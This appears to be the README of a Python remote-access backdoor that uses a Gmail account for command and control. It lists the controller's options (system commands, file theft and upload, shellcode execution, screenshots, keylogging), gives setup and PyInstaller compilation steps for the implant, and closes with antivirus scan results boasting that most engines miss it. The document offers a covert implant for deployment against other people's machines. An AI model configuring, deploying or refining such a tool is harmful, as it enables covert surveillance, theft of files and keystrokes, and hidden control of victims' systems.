A stealthy Python based backdoor that uses Gmail as a command and control server
Options:
Code:
optional arguments:
  -h, --help            show this help message and exit
  -v, --version         show program's version number and exit
  -id ID                Client to target
  -jobid JOBID          Job id to retrieve
  -list                 List available clients
  -info                 Retrieve info on specified client

Commands:
  Commands to execute on an implant

  -cmd CMD              Execute a system command
  -download PATH        Download a file from a clients system
  -upload SRC DST       Upload a file to the clients system
  -exec-shellcode FILE  Execute supplied shellcode on a client
  -screenshot           Take a screenshot
  -lock-screen          Lock the clients screen
  -force-checkin        Force a check in
  -start-keylogger      Start keylogger
  -stop-keylogger       Stop keylogger

Meow!
Setup
For this to work you need:
A Gmail account (Use a dedicated account! Do not use your personal one!)
Turn on "Allow less secure apps" under the security settings of the account
You may also have to enable IMAP in the account settings
This repo contains two files:
gcat.py a script that's used to enumerate and issue commands to available clients
implant.py the actual backdoor to deploy
In both files, edit the gmail_user and gmail_pwd variables with the username and password of the account you previously set up.
You're probably going to want to compile implant.py into an executable using Pyinstaller
Filename: implant.py
Detection Rate: 6/35
File Size: 23kb
File MD5: 3e527b7c656ecdfcfc247ee420a3a967
File SHA1: 1d2d273d312bae585ba56badf7cda75953b13ecc
Date: 16-Aug-2016 14:35:12 GMT
AVG Free : Clean
Avast : Python:InfoStealer-A [Trj]
AntiVir (Avira) : Clean
BitDefender : Clean
Clam Antivirus : Clean
COMODO Internet Security : Clean
Dr.Web : Python.BackDoor.14
eTrust-Vet : Clean
F-PROT Antivirus : Clean
F-Secure Internet Security : Clean
G Data : Clean
IKARUS Security : Trojan.Python.Agent
Kaspersky Antivirus : Clean
McAfee : Clean
MS Security Essentials : Backdoor:Python/Atalag.A
ESET NOD32 : Backdoor.Python/Agent.K
Norman : Clean
Norton Antivirus : Backdoor.Trojan
Panda Security : Clean
A-Squared : Clean
Quick Heal Antivirus : Clean
Solo Antivirus : Clean
Sophos : Clean
Trend Micro Internet Security : Clean
VBA32 Antivirus : Clean
Zoner AntiVirus : Clean
Ad-Aware : Clean
BullGuard : Clean
FortiClient : Clean
K7 Ultimate : Clean
NANO Antivirus : Clean
Panda CMD : Clean
VIPRE : Clean
SUPERAntiSpyware : Clean
Twister Antivirus : Clean